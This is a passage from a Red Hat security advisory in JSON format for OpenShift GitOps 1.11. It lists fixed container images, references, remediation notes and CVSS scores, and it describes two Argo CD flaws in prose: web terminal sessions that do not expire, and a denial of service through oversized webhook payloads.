"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40025",
"cwe": {
"id": "CWE-613",
"name": "Insufficient Session Expiration"
},
"discovery_date": "2024-07-30T04:26:12+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301445"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argo-cd: Argo CD web terminal session doesn\u0027t expire",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40025"
},
{
"category": "external",
"summary": "RHBZ#2301445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301445"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40025"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr",
"url": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr"
}
],
"release_date": "2023-08-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-08-01T10:48:26+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "argo-cd: Argo CD web terminal session doesn\u0027t expire"
},
{
"cve": "CVE-2024-40634",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-23T14:26:36+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2299473"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-40634"
},
{
"category": "external",
"summary": "RHBZ#2299473",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299473"
},
{
"category": "external",
